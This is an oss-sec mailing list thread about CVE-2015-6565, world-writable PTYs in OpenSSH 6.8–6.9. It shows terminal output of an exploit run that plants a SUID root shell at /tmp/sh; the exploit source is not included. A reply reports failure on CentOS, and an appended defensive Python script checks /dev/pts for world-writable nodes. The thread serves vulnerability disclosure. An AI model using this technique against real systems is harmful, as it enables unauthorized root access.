oss-sec mailing list archives

Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux


From: Noryungi <noryungi () gmail com>
Date: Thu, 26 Jan 2017 18:35:12 +0100

Does not work on CentOS 7.1 (unpatched) running stock OpenSSH.

TTY capture works, /tmp/sh is created but user is unprivileged.

On Jan 26, 2017 5:52 PM, <up201407890 () alunos dcc fc up pt> wrote:

Hi list,

I know I'm late to the party, but I was bored, so I decided to write an
exploit for CVE-2015-6565, which affects OpenSSH 6.8-6.9.
It is mostly considered to be a "DoS", even though Jann Horn publicly told
how it could be exploited for local privilege escalation, but I guess it's
either PoC||GTFO for users to update.

From https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565

"sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY
devices, which allows local users to cause a denial of service (terminal
disruption) or possibly have unspecified other impact by writing to a
device, as demonstrated by writing an escape sequence."

I think the description should be updated.

$ gcc not_an_sshnuke.c -o not_an_sshnuke
$ ./not_an_sshnuke /dev/pts/3
[*] Waiting for slave device /dev/pts/3
[+] Got PTY slave /dev/pts/3
[+] Making PTY slave the controlling terminal
[+] SUID shell at /tmp/sh
$ /tmp/sh --norc --noprofile -p
# id
euid=0(root) groups=0(root)

Thanks,
Federico Bento.
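The CVE text quoted in the thread says the affected sshd creates the slave TTY with world-writable permissions. The script below is an added example, not code from either poster or from the OpenSSH project: it checks the mode bits of PTY nodes and flags any character device that grants write to "other". The normal mode for an allocated PTY on Linux is 0620 with group "tty" (the write(1)/wall(1) convention); 0622 or 0666 on a slave is the condition the advisory describes. The sample entries are constructed inline so the logic runs offline; `scan_dev_pts()` does the same check against the live /dev/pts, and the directory name and the decision to skip the `ptmx` multiplexer node are this example's own assumptions.

```python
import os
import stat

# Constructed sample of (path, st_mode) pairs as os.stat() would report
# them. Only the two slaves with the "other write" bit set are offenders.
SAMPLE_PTYS = [
    ("/dev/pts/0", stat.S_IFCHR | 0o620),  # normal: rw- -w- ---
    ("/dev/pts/1", stat.S_IFCHR | 0o622),  # world-writable slave
    ("/dev/pts/3", stat.S_IFCHR | 0o666),  # world-writable slave
    ("/tmp/notes", stat.S_IFREG | 0o666),  # regular file, not a tty
]


def is_world_writable_tty(mode: int) -> bool:
    """True for a character device whose mode grants write to 'other'.

    Regular files and directories are ignored even if they are 0666,
    since the check is only meaningful for terminal device nodes.
    """
    return stat.S_ISCHR(mode) and bool(mode & stat.S_IWOTH)


def find_world_writable(entries):
    """Return the paths from (path, mode) pairs that fail the check."""
    return [path for path, mode in entries if is_world_writable_tty(mode)]


def scan_dev_pts(directory="/dev/pts"):
    """Live check: stat every slave under /dev/pts and return offenders.

    'ptmx' is the multiplexer, not a slave; its mode is governed by the
    devpts mount option (ptmxmode), so it is skipped here (assumption of
    this example). Nodes that vanish between listdir and stat are ignored.
    """
    entries = []
    try:
        names = os.listdir(directory)
    except OSError:
        return []
    for name in names:
        if name == "ptmx":
            continue
        path = os.path.join(directory, name)
        try:
            entries.append((path, os.stat(path).st_mode))
        except OSError:
            continue
    return find_world_writable(entries)


if __name__ == "__main__":
    for path in find_world_writable(SAMPLE_PTYS):
        print("sample: world-writable tty", path)
    for path in scan_dev_pts():
        print("live:   world-writable tty", path)
```

A clean result from the live scan only says that no currently allocated PTY is world-writable; a system with the affected sshd shows the problem only while a vulnerable session has a PTY open, so run the check while users are logged in or, better, confirm the installed OpenSSH version directly.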
